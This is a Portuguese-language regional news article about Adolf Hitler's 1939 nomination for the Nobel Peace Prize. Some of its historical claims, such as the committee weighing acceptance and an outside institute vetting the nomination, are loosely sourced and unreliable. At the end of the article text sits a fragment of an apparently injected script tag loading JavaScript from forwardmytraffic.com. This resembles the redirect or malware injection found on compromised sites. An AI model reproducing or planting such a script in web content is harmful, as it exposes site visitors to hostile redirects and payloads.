InícioVariedadesHitler e o prêmio Nobel da Paz

Hitler e o prêmio Nobel da Paz

Últimas notícias

Frente fria provoca temporais em Santa Catarina neste fim de semana

Instabilidade atinge todas as regiões, com risco de vendavais...

Notas do Enem 2025 já estão disponíveis na internet

As notas do Exame Nacional do Ensino Médio (Enem) 2025 já...
- Anúncio -

Quem poderia imaginar que o responsável pelo holocausto, causador da morte de milhões de pessoas durante o regime nazista da Alemanha, teria sido indicado ao Prêmio Nobel da Paz? A Informação é no mínimo, intrigante, mas também é verdadeira. Adolf Hitler foi indicado ao Prêmio Nobel da Paz em 1939.

 

Segundo o jornal espanhol “ABC”, que publicou um artigo de Carmen Villar, Hitler teria sido indicado ao prêmio pelo deputado sueco E.G.C Brandt.  Após a indicação, o comitê do prêmio chegou a cogitar a possibilidade de aceitar que Hitler recebesse a premiação. Entretanto, a indicação teria que passar também pelo crivo do instituto Nansen, uma organização dedicada a investigações diversas.

 

De acordo com o jornal, Hitler acabou não recebendo votos suficientes, e sua nomeação foi cancelada. Na época, a indicação gerou muita polemica e discussão entre os membros do comitê do premio Nobel. Algumas pessoas defendiam que Hitler merecia o Nobel da Paz devido às “conversações que manteve com o governo britânico sobre a paz na Europa”.

 

O caso acabou arquivado e escondido a sete chaves por vários anos. Havia quem defendesse a idéia de que Hitler deveria ser agraciado, postumamente, com o Prêmio Nobel da Paz, afirmando que o nazista não tinha sido culpado pela Segunda Guerra Mundial e alegando que ele havia trabalhado pela paz em todos os sentidos.

 

Por sorte, o bom senso prevaleceu e Hitler entrou o seu papel na historia da humanidade:

O de assassino cruel, sádico e ditador…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

- Anúncio -
Equipe Gazeta
Equipe Gazetahttps://gazetatresbarrense.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.